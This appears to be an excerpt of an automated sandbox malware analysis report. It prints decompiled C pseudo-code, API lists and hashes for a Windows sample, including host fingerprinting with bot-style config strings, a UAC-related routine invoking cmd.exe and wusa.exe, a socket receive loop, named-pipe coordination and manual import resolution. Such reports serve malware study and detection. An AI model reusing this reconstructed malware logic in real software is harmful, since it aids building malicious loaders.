                                                                                                                                  0x00401fde
                                                                                                                                  0x00401fea

                                                                                                                                  APIs
                                                                                                                                  • GetVersionExA.KERNEL32 ref: 00401DC6
                                                                                                                                  • GetSystemInfo.KERNEL32(?), ref: 00401DE8
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00401E03
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00401E0A
                                                                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00401E1B
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00401FC9
                                                                                                                                    • Part of subcall function 00401BDF: GetComputerNameA.KERNEL32 ref: 00401C15
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                                                                  • String ID: 0 v$IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
                                                                                                                                  • API String ID: 4207808166-1853734742
                                                                                                                                  • Opcode ID: 857587d66ef5407bd9f823cee7786aca052e01b20ac6ebc7d69f7416010c46cb
                                                                                                                                  • Instruction ID: cd5e56fee8dacda117f2c3378b491c5a2df23dd5de729853a430aab3da097112
                                                                                                                                  • Opcode Fuzzy Hash: 857587d66ef5407bd9f823cee7786aca052e01b20ac6ebc7d69f7416010c46cb
                                                                                                                                  • Instruction Fuzzy Hash: 2551EA705043446FD330AF768C85F67BAECEB84708F00493FF955A2292D7BDA94487A9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00401280 Relevance: 30.2, APIs: 9, Strings: 8, Instructions: 417stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 0040139A
                                                                                                                                  • lstrlenW.KERNEL32(-00000003), ref: 00401571
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExecuteShelllstrlen
                                                                                                                                  • String ID: $%systemroot%\system32\cmd.exe$<$@$D$uac$useless$wusa.exe
                                                                                                                                  • API String ID: 1628651668-1839596206
                                                                                                                                  • Opcode ID: ab4c75885172d034ed3803886c8c211ded8e4a09802339f18fb7352a61972d3c
                                                                                                                                  • Instruction ID: 915494465e6448ea0d8334ed2feda226c725056e28db06d0983f622db304c09c
                                                                                                                                  • Opcode Fuzzy Hash: ab4c75885172d034ed3803886c8c211ded8e4a09802339f18fb7352a61972d3c
                                                                                                                                  • Instruction Fuzzy Hash: E5F19FB55083419FD720DF64C888BABB7E5FB88304F10892EF596A73A0D778D944CB5A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00402A62 Relevance: 27.2, APIs: 18, Instructions: 194networkmemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 53%
                                                                                                                                  			E00402A62(void* __ecx, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v44;
				signed short _v272;
				char _v276;
				long _v280;
				char _v284;
				signed short _v288;
				signed short _v292;
				long _v300;
				long _v304;
				intOrPtr _v308;
				signed short _v324;
				intOrPtr _v332;
				signed short _v336;
				signed int _v340;
				signed int _v344;
				void* _v348;
				signed short _v352;
				signed short _v356;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t53;
				signed short _t66;
				void** _t71;
				void* _t76;
				void* _t77;
				void* _t78;
				signed short _t79;
				intOrPtr* _t81;
				signed short _t82;
				signed short _t83;
				intOrPtr _t86;
				signed int _t88;
				void* _t90;
				long _t91;
				signed short _t92;
				void* _t94;

				_t77 = __ecx;
				_t91 = 0;
				 *_a12 = 1;
				_t50 = HeapAlloc(GetProcessHeap(), 0, 0x1000);
				_t76 = _t50;
				if(_t76 != 0) {
					__imp__#23(2, 2, 0x11, _t78);
					_t79 = _t50;
					_v288 = _t79;
					if(_t79 == 0 || _t79 == 0xffffffff) {
						HeapFree(GetProcessHeap(), _t91, _t76);
						_t53 = 0;
						goto L37;
					} else {
						_v304 = 0;
						while(1) {
							_v300 = _t91;
							if(_v304 != _t91) {
								_push(_t91);
							} else {
								_push(0x100);
							}
							__imp__#9();
							_t50 = E004026FF(_v8, _t79, _v12, _t50 & 0x0000ffff);
							_t94 = _t94 + 0xc;
							if(_t50 != 0) {
								goto L32;
							}
							_t86 = 0xc;
							_t50 =  &_v276;
							_v272 = _t79;
							_v276 = 1;
							_v284 = _t86;
							_v280 = _t91;
							__imp__#18(_t91, _t50, _t91, _t91,  &_v284);
							if(_t50 <= 0) {
								goto L32;
							}
							_t50 = E0040EE2A(_t77, _t76, _t91, 4);
							_t94 = _t94 + 0xc;
							__imp__#16(_t79, _t76, 0x1000, _t91);
							_t92 = _t50;
							_v324 = _t92;
							if(_t92 > 0 && _t92 > _t86) {
								_t81 = __imp__#15;
								_t88 =  *_t81( *(_t76 + 2) & 0x0000ffff) & 0xf;
								if(_t88 == 3) {
									L34:
									 *_v44 = 2;
									L35:
									HeapFree(GetProcessHeap(), 0, _t76);
									__imp__#3(_v292);
									_t53 = _v308;
									L37:
									return _t53;
								}
								if(_t88 != 2) {
									L16:
									if(_t88 != 0) {
										goto L32;
									}
									_t50 = E00402923(_t77, _t76, _t92);
									_pop(_t77);
									_v336 = _t50;
									if(_t50 == 0) {
										goto L32;
									}
									_v340 = _v340 & 0x00000000;
									_v344 = _v344 & 0x00000000;
									_t82 = _t50;
									_v352 = _t82;
									L20:
									while(1) {
										if( *((short*)(_t82 + 0x10a)) != 1 ||  *((short*)(_t82 + 0x108)) != 0xf ||  *((short*)(_t82 + 0x10c)) < 3) {
											L30:
											_t83 =  *_t82;
											_v352 = _t83;
											if(_t83 != 0) {
												_t82 = _v352;
												continue;
											}
											goto L31;
										} else {
											_t90 = HeapAlloc(GetProcessHeap(), 0, 0x108);
											if(_t90 == 0) {
												L31:
												_t50 = E00402904(_v336);
												if(_v344 != 0) {
													goto L35;
												}
												goto L32;
											}
											E0040EE2A(_t77, _t90, 0, 0x108);
											_t66 =  *( *((intOrPtr*)(_t82 + 0x110)) + _t76) & 0x0000ffff;
											_t94 = _t94 + 0xc;
											__imp__#15();
											 *(_t90 + 4) = _t66 & 0x0000ffff;
											_t33 = _t90 + 8; // 0x8
											E00402871( *((intOrPtr*)(_t82 + 0x110)) + 2, _t76, _t77, _t33, _v332);
											_t77 = _t66;
											if( *((char*)(_t90 + 8)) != 0) {
												_t71 = _v344;
												_v344 = _t90;
												if(_t71 != 0) {
													 *_t71 = _t90;
												} else {
													_v348 = _t90;
												}
											} else {
												HeapFree(GetProcessHeap(), 0, _t90);
											}
											_t82 = _v356;
											goto L30;
										}
									}
								}
								_push( *(_t76 + 2) & 0x0000ffff);
								if( *_t81() < 0) {
									goto L34;
								}
								goto L16;
							}
							L32:
							_v308 = _v308 + 1;
							if(_v308 < 2) {
								_t79 = _v292;
								_t91 = 0;
								continue;
							}
							goto L35;
						}
					}
				}
				return 0;
			}










































                                                                                                                                  0x00402a62
                                                                                                                                  0x00402a7a
                                                                                                                                  0x00402a7d
                                                                                                                                  0x00402a86
                                                                                                                                  0x00402a8c
                                                                                                                                  0x00402a90
                                                                                                                                  0x00402aa0
                                                                                                                                  0x00402aa6
                                                                                                                                  0x00402aa8
                                                                                                                                  0x00402aae
                                                                                                                                  0x00402cd8
                                                                                                                                  0x00402cde
                                                                                                                                  0x00000000
                                                                                                                                  0x00402abd
                                                                                                                                  0x00402abd
                                                                                                                                  0x00402ac9
                                                                                                                                  0x00402ac9
                                                                                                                                  0x00402ad1
                                                                                                                                  0x00402ada
                                                                                                                                  0x00402ad3
                                                                                                                                  0x00402ad3
                                                                                                                                  0x00402ad3
                                                                                                                                  0x00402adb
                                                                                                                                  0x00402af4
                                                                                                                                  0x00402af9
                                                                                                                                  0x00402afe
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402b06
                                                                                                                                  0x00402b0e
                                                                                                                                  0x00402b14
                                                                                                                                  0x00402b18
                                                                                                                                  0x00402b20
                                                                                                                                  0x00402b24
                                                                                                                                  0x00402b28
                                                                                                                                  0x00402b30
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402b3a
                                                                                                                                  0x00402b3f
                                                                                                                                  0x00402b4a
                                                                                                                                  0x00402b50
                                                                                                                                  0x00402b52
                                                                                                                                  0x00402b58
                                                                                                                                  0x00402b6a
                                                                                                                                  0x00402b76
                                                                                                                                  0x00402b7c
                                                                                                                                  0x00402ca6
                                                                                                                                  0x00402cad
                                                                                                                                  0x00402cb3
                                                                                                                                  0x00402cbd
                                                                                                                                  0x00402cc7
                                                                                                                                  0x00402ccd
                                                                                                                                  0x00402ce0
                                                                                                                                  0x00000000
                                                                                                                                  0x00402ce0
                                                                                                                                  0x00402b85
                                                                                                                                  0x00402b96
                                                                                                                                  0x00402b98
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402ba1
                                                                                                                                  0x00402ba6
                                                                                                                                  0x00402ba7
                                                                                                                                  0x00402bad
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402bb3
                                                                                                                                  0x00402bb8
                                                                                                                                  0x00402bbd
                                                                                                                                  0x00402bbf
                                                                                                                                  0x00000000
                                                                                                                                  0x00402bc9
                                                                                                                                  0x00402bd1
                                                                                                                                  0x00402c77
                                                                                                                                  0x00402c77
                                                                                                                                  0x00402c79
                                                                                                                                  0x00402c7f
                                                                                                                                  0x00402bc5
                                                                                                                                  0x00000000
                                                                                                                                  0x00402bc5
                                                                                                                                  0x00000000
                                                                                                                                  0x00402bf3
                                                                                                                                  0x00402c08
                                                                                                                                  0x00402c0c
                                                                                                                                  0x00402c85
                                                                                                                                  0x00402c89
                                                                                                                                  0x00402c93
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402c93
                                                                                                                                  0x00402c12
                                                                                                                                  0x00402c1d
                                                                                                                                  0x00402c21
                                                                                                                                  0x00402c25
                                                                                                                                  0x00402c32
                                                                                                                                  0x00402c3e
                                                                                                                                  0x00402c41
                                                                                                                                  0x00402c4a
                                                                                                                                  0x00402c4b
                                                                                                                                  0x00402c5f
                                                                                                                                  0x00402c63
                                                                                                                                  0x00402c69
                                                                                                                                  0x00402c71
                                                                                                                                  0x00402c6b
                                                                                                                                  0x00402c6b
                                                                                                                                  0x00402c6b
                                                                                                                                  0x00402c4d
                                                                                                                                  0x00402c57
                                                                                                                                  0x00402c57
                                                                                                                                  0x00402c73
                                                                                                                                  0x00000000
                                                                                                                                  0x00402c73
                                                                                                                                  0x00402bd1
                                                                                                                                  0x00402bc9
                                                                                                                                  0x00402b8b
                                                                                                                                  0x00402b90
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402b90
                                                                                                                                  0x00402c95
                                                                                                                                  0x00402c95
                                                                                                                                  0x00402c9e
                                                                                                                                  0x00402ac3
                                                                                                                                  0x00402ac7
                                                                                                                                  0x00000000
                                                                                                                                  0x00402ac7
                                                                                                                                  0x00000000
                                                                                                                                  0x00402ca4
                                                                                                                                  0x00402ac9
                                                                                                                                  0x00402aae
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,761B4F20), ref: 00402A83
                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,761B4F20), ref: 00402A86
                                                                                                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 00402AA0
                                                                                                                                  • htons.WS2_32(00000000), ref: 00402ADB
                                                                                                                                  • select.WS2_32 ref: 00402B28
                                                                                                                                  • recv.WS2_32(?,00000000,00001000,00000000), ref: 00402B4A
                                                                                                                                  • htons.WS2_32(?), ref: 00402B71
                                                                                                                                  • htons.WS2_32(?), ref: 00402B8C
                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000108), ref: 00402BFB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heaphtons$Process$Allocrecvselectsocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1639031587-0
                                                                                                                                  • Opcode ID: 72f5f8f4b8a6e38625c08c3a78b0cfce54e590fe4137906a5456ad4f28646144
                                                                                                                                  • Instruction ID: 51c4a8f8372388146ce05ee3fd67d3b8acfed2692fca977a8adbfce498b2b585
                                                                                                                                  • Opcode Fuzzy Hash: 72f5f8f4b8a6e38625c08c3a78b0cfce54e590fe4137906a5456ad4f28646144
                                                                                                                                  • Instruction Fuzzy Hash: FB61D271508305ABD7209F51DE0CB6FBBE8FB48345F14482AF945A72D1D7F8D8808BAA
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040405E Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 203COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E0040405E(void* __ecx) {
				unsigned int _v8;
				unsigned int _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v40;
				void* _t40;
				void* _t43;
				void* _t49;
				void* _t56;
				void* _t62;
				void* _t64;
				long _t71;
				void* _t82;
				void* _t92;
				void* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t104;

				_t95 = __ecx;
				_v8 = 0;
				_t40 = CreateEventA(0, 1, 1, 0);
				_v16 = _t40;
				if(_t40 != 0) {
					_t43 = E00404000(E00403ECD(_t95),  &_v20);
					_t97 = _t98;
					_t102 = 0x7d0;
					_t92 = 0x100;
					_t99 = 0x4122f8;
					if(_t43 == 0) {
						L10:
						E0040EE2A(_t97, _t99, 0, _t92);
						_t104 = _t103 + 0xc;
						_t93 = 0xa;
						while(1) {
							_t93 = _t93 - 1;
							_t99 = CreateNamedPipeA(E00403ECD(_t97), 0x40000003, 0, 0xff, 0x64, 0x64, 0x64, 0);
							if(_t99 != 0xffffffff) {
								break;
							}
							Sleep(0x1f4);
							if(_t93 != 0) {
								continue;
							}
							CloseHandle(_v16);
							return 0;
						}
						L14:
						while(1) {
							do {
								L14:
								while(1) {
									do {
										if(ConnectNamedPipe(_t99, 0) != 0) {
											goto L16;
										}
										_t71 = GetLastError();
										asm("sbb eax, eax");
										if( ~(_t71 - 0x217) + 1 == 0) {
											L25:
											DisconnectNamedPipe(_t99);
											continue;
										}
										L16:
										_t49 = E00403F8C(_t99,  &_v12, 4, _v16, _t102);
										_t104 = _t104 + 0x14;
									} while (_t49 == 0);
									_t92 = _v16;
									_v8 = (_v12 >> 2) + _v12;
									E00403F18(_t99,  &_v8, 4, _t92, _t102);
									_t56 = E00403F8C(_t99,  &_v12, 4, _t92, _t102);
									_t104 = _t104 + 0x28;
									if(_t56 == 0 || _v12 != (_v8 >> 2) + _v8) {
										goto L25;
									} else {
										_t62 = E00403F8C(_t99,  &_v28, 8, _t92, _t102);
										_t104 = _t104 + 0x14;
										if(_t62 == 0 || _v24 != 0xc) {
											goto L25;
										} else {
											_t64 = E00403F8C(_t99,  &_v40, 0xc, _t92, _t102);
											_t104 = _t104 + 0x14;
											if(_t64 == 0) {
												goto L25;
											}
											break;
										}
									}
								}
							} while (_v28 != 1);
							E00403F18(_t99,  &_v8, 4, _t92, _t102);
							_t103 = _t104 + 0x14;
							if(_v32 == 0) {
								_t102 = CloseHandle;
								CloseHandle(_t99);
								CloseHandle(_t92);
								E0040E318();
								L8:
								ExitProcess(0);
							}
							 *0x41215a =  *0x41215a + 1;
						}
					}
					E0040EE2A(_t97, 0x4122f8, 0, 0x100);
					_t103 = _t103 + 0xc;
					if(_v20 == 0xffffffff) {
						goto L10;
					}
					_v12 = E0040ECA5();
					E00403F18(_v20,  &_v12, 4, _v16, 0x7d0);
					_t82 = E00403F8C(_v20,  &_v8, 4, _v16, 0x7d0);
					_t103 = _t103 + 0x28;
					if(_t82 == 0 || _v8 != (_v12 >> 2) + _v12) {
						CloseHandle(_v20);
						goto L10;
					} else {
						_v8 = _v8 + (_v8 >> 2);
						E00403F18(_v20,  &_v8, 4, _v16, 0x7d0);
						_t103 = _t103 + 0x14;
						goto L8;
					}
				}
				return 0;
			}



























                                                                                                                                  0x0040405e
                                                                                                                                  0x0040406d
                                                                                                                                  0x00404070
                                                                                                                                  0x00404076
                                                                                                                                  0x0040407b
                                                                                                                                  0x00404090
                                                                                                                                  0x00404096
                                                                                                                                  0x00404097
                                                                                                                                  0x0040409c
                                                                                                                                  0x004040a1
                                                                                                                                  0x004040a8
                                                                                                                                  0x00404130
                                                                                                                                  0x00404134
                                                                                                                                  0x00404139
                                                                                                                                  0x0040413e
                                                                                                                                  0x0040413f
                                                                                                                                  0x00404153
                                                                                                                                  0x00404160
                                                                                                                                  0x00404165
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040416c
                                                                                                                                  0x00404174
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00404179
                                                                                                                                  0x00000000
                                                                                                                                  0x00404182
                                                                                                                                  0x00000000
                                                                                                                                  0x00404188
                                                                                                                                  0x00404188
                                                                                                                                  0x00000000
                                                                                                                                  0x00404188
                                                                                                                                  0x00404188
                                                                                                                                  0x00404193
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00404195
                                                                                                                                  0x004041a2
                                                                                                                                  0x004041a5
                                                                                                                                  0x0040425e
                                                                                                                                  0x0040425f
                                                                                                                                  0x00000000
                                                                                                                                  0x0040425f
                                                                                                                                  0x004041ab
                                                                                                                                  0x004041b6
                                                                                                                                  0x004041bb
                                                                                                                                  0x004041be
                                                                                                                                  0x004041c5
                                                                                                                                  0x004041d0
                                                                                                                                  0x004041da
                                                                                                                                  0x004041e8
                                                                                                                                  0x004041ed
                                                                                                                                  0x004041f2
                                                                                                                                  0x00000000
                                                                                                                                  0x00404202
                                                                                                                                  0x0040420b
                                                                                                                                  0x00404210
                                                                                                                                  0x00404215
                                                                                                                                  0x00000000
                                                                                                                                  0x0040421d
                                                                                                                                  0x00404226
                                                                                                                                  0x0040422b
                                                                                                                                  0x00404230
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00404230
                                                                                                                                  0x00404215
                                                                                                                                  0x004041f2
                                                                                                                                  0x00404232
                                                                                                                                  0x00404245
                                                                                                                                  0x0040424a
                                                                                                                                  0x00404251
                                                                                                                                  0x0040426a
                                                                                                                                  0x00404271
                                                                                                                                  0x00404274
                                                                                                                                  0x00404276
                                                                                                                                  0x0040411f
                                                                                                                                  0x00404121
                                                                                                                                  0x00404121
                                                                                                                                  0x00404253
                                                                                                                                  0x00404253
                                                                                                                                  0x00404188
                                                                                                                                  0x004040b2
                                                                                                                                  0x004040b7
                                                                                                                                  0x004040be
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004040c9
                                                                                                                                  0x004040d5
                                                                                                                                  0x004040e7
                                                                                                                                  0x004040ec
                                                                                                                                  0x004040f1
                                                                                                                                  0x0040412a
                                                                                                                                  0x00000000
                                                                                                                                  0x00404101
                                                                                                                                  0x0040410b
                                                                                                                                  0x00404117
                                                                                                                                  0x0040411c
                                                                                                                                  0x00000000
                                                                                                                                  0x0040411c
                                                                                                                                  0x004040f1
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00404070
                                                                                                                                  • ExitProcess.KERNEL32 ref: 00404121
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateEventExitProcess
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 2404124870-2980165447
                                                                                                                                  • Opcode ID: a7245d695b6c108c1b2c14e57ed76f02bf9552f3b235e99bac8c66b9f90f9768
                                                                                                                                  • Instruction ID: 074d9bb49edb1fcb374f0917b5464843becdd4ef2bd88426a03fabb40598a920
                                                                                                                                  • Opcode Fuzzy Hash: a7245d695b6c108c1b2c14e57ed76f02bf9552f3b235e99bac8c66b9f90f9768
                                                                                                                                  • Instruction Fuzzy Hash: 3C5192B1E00209BAEB10ABA19D45FFF7A7CEB54755F00007AFB04B61C1E7798A41C7A9
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00406069 Relevance: 7.6, APIs: 5, Instructions: 121libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00406069(_Unknown_base(*)()* _a4) {
				intOrPtr* _v8;
				signed int _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _t47;
				_Unknown_base(*)()* _t48;
				_Unknown_base(*)()* _t50;
				struct HINSTANCE__* _t52;
				_Unknown_base(*)()* _t53;
				_Unknown_base(*)()* _t54;
				_Unknown_base(*)()* _t55;
				signed int _t56;
				_Unknown_base(*)()* _t59;
				_Unknown_base(*)()* _t62;
				_Unknown_base(*)()* _t63;
				intOrPtr _t69;
				_Unknown_base(*)()* _t76;
				_Unknown_base(*)()* _t77;
				intOrPtr* _t82;
				void* _t85;
				intOrPtr* _t87;
				_Unknown_base(*)()* _t89;

				_t82 = _a4;
				_t47 =  *_t82;
				_t3 = _t82 + 4; // 0x65e85621
				_t69 =  *_t3;
				_v12 = 1;
				if( *((intOrPtr*)(_t47 + 0x84)) != 0) {
					_t85 =  *((intOrPtr*)(_t47 + 0x80)) + _t69;
					_t48 = IsBadReadPtr(_t85, 0x14);
					__eflags = _t48;
					if(_t48 != 0) {
						L29:
						return _v12;
					}
					_t87 = _t85 + 0x10;
					_v8 = _t87;
					while(1) {
						_t50 =  *(_t87 - 4);
						__eflags = _t50;
						if(_t50 == 0) {
							goto L29;
						}
						_t52 = LoadLibraryA(_t50 + _t69);
						_v16 = _t52;
						__eflags = _t52 - 0xffffffff;
						if(_t52 == 0xffffffff) {
							L28:
							_t44 =  &_v12;
							 *_t44 = _v12 & 0x00000000;
							__eflags =  *_t44;
							goto L29;
						}
						_t10 = _t82 + 8; // 0x8bfffffa
						_t53 =  *_t10;
						__eflags = _t53;
						if(_t53 != 0) {
							_t14 = _t82 + 0xc; // 0x28408b06
							_t54 = E0040EBED(_t53, 4 +  *_t14 * 4);
						} else {
							_t11 = _t82 + 0xc; // 0x28408b06
							_t54 = E0040EBCC(4 +  *_t11 * 4);
						}
						 *(_t82 + 8) = _t54;
						__eflags = _t54;
						if(_t54 == 0) {
							goto L28;
						} else {
							_t18 = _t82 + 0xc; // 0x28408b06
							 *((intOrPtr*)(_t54 +  *_t18 * 4)) = _v16;
							 *(_t82 + 0xc) =  *(_t82 + 0xc) + 1;
							_t55 =  *(_t87 - 0x10);
							__eflags = _t55;
							if(_t55 == 0) {
								_t89 =  *_t87 + _t69;
								__eflags = _t89;
								_t76 = _t89;
							} else {
								_t89 = _t55 + _t69;
								_t76 =  *_v8 + _t69;
							}
							_t56 =  *_t89;
							__eflags = _t56;
							if(_t56 == 0) {
								L25:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L29;
								}
								_v8 = _v8 + 0x14;
								_t59 = IsBadReadPtr(_v8 + 0xfffffff0, 0x14);
								__eflags = _t59;
								if(_t59 == 0) {
									_t87 = _v8;
									continue;
								}
								goto L29;
							} else {
								_a4 = _t76;
								_a4 = _a4 - _t89;
								__eflags = _t56;
								do {
									if(__eflags >= 0) {
										_t62 = GetProcAddress(_v16, _t56 + _t69 + 2);
										__eflags = _t62;
										if(_t62 == 0) {
											L21:
											_t63 = _a4;
											__eflags =  *(_t63 + _t89);
											if( *(_t63 + _t89) == 0) {
												_t38 =  &_v12;
												 *_t38 = _v12 & 0x00000000;
												__eflags =  *_t38;
												goto L25;
											}
											goto L22;
										}
										_t77 = _a4;
										__eflags = _t62 -  *(_t77 + _t89);
										if(_t62 ==  *(_t77 + _t89)) {
											goto L21;
										}
										L20:
										 *(_t77 + _t89) = _t62;
										goto L21;
									}
									_t62 = GetProcAddress(_v16, _t56 & 0x0000ffff);
									_t77 = _a4;
									goto L20;
									L22:
									_t89 = _t89 + 4;
									_t56 =  *_t89;
									__eflags = _t56;
								} while (__eflags != 0);
								goto L25;
							}
						}
					}
					goto L29;
				}
				return 1;
			}
























                                                                                                                                  0x00406071
                                                                                                                                  0x00406074
                                                                                                                                  0x0040607c
                                                                                                                                  0x0040607c
                                                                                                                                  0x00406082
                                                                                                                                  0x00406087
                                                                                                                                  0x00406099
                                                                                                                                  0x0040609c
                                                                                                                                  0x004060a2
                                                                                                                                  0x004060a4
                                                                                                                                  0x004061b2
                                                                                                                                  0x00000000
                                                                                                                                  0x004061b5
                                                                                                                                  0x004060aa
                                                                                                                                  0x004060ad
                                                                                                                                  0x004060b5
                                                                                                                                  0x004060b5
                                                                                                                                  0x004060b8
                                                                                                                                  0x004060ba
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004060c3
                                                                                                                                  0x004060c9
                                                                                                                                  0x004060cc
                                                                                                                                  0x004060cf
                                                                                                                                  0x004061ae
                                                                                                                                  0x004061ae
                                                                                                                                  0x004061ae
                                                                                                                                  0x004061ae
                                                                                                                                  0x00000000
                                                                                                                                  0x004061ae
                                                                                                                                  0x004060d5
                                                                                                                                  0x004060d5
                                                                                                                                  0x004060d8
                                                                                                                                  0x004060da
                                                                                                                                  0x004060ee
                                                                                                                                  0x004060fa
                                                                                                                                  0x004060dc
                                                                                                                                  0x004060dc
                                                                                                                                  0x004060e7
                                                                                                                                  0x004060e7
                                                                                                                                  0x00406101
                                                                                                                                  0x00406104
                                                                                                                                  0x00406106
                                                                                                                                  0x00000000
                                                                                                                                  0x0040610c
                                                                                                                                  0x0040610c
                                                                                                                                  0x00406112
                                                                                                                                  0x00406115
                                                                                                                                  0x00406118
                                                                                                                                  0x0040611b
                                                                                                                                  0x0040611d
                                                                                                                                  0x0040612d
                                                                                                                                  0x0040612d
                                                                                                                                  0x0040612f
                                                                                                                                  0x0040611f
                                                                                                                                  0x0040611f
                                                                                                                                  0x00406127
                                                                                                                                  0x00406127
                                                                                                                                  0x00406131
                                                                                                                                  0x00406133
                                                                                                                                  0x00406135
                                                                                                                                  0x0040618b
                                                                                                                                  0x0040618b
                                                                                                                                  0x0040618f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406191
                                                                                                                                  0x0040619e
                                                                                                                                  0x004061a4
                                                                                                                                  0x004061a6
                                                                                                                                  0x004060b2
                                                                                                                                  0x00000000
                                                                                                                                  0x004060b2
                                                                                                                                  0x00000000
                                                                                                                                  0x00406137
                                                                                                                                  0x00406137
                                                                                                                                  0x0040613a
                                                                                                                                  0x0040613d
                                                                                                                                  0x0040613f
                                                                                                                                  0x0040613f
                                                                                                                                  0x0040615e
                                                                                                                                  0x00406164
                                                                                                                                  0x00406166
                                                                                                                                  0x00406173
                                                                                                                                  0x00406173
                                                                                                                                  0x00406176
                                                                                                                                  0x0040617a
                                                                                                                                  0x00406187
                                                                                                                                  0x00406187
                                                                                                                                  0x00406187
                                                                                                                                  0x00000000
                                                                                                                                  0x00406187
                                                                                                                                  0x00000000
                                                                                                                                  0x0040617a
                                                                                                                                  0x00406168
                                                                                                                                  0x0040616b
                                                                                                                                  0x0040616e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406170
                                                                                                                                  0x00406170
                                                                                                                                  0x00000000
                                                                                                                                  0x00406170
                                                                                                                                  0x0040614a
                                                                                                                                  0x00406150
                                                                                                                                  0x00000000
                                                                                                                                  0x0040617c
                                                                                                                                  0x0040617c
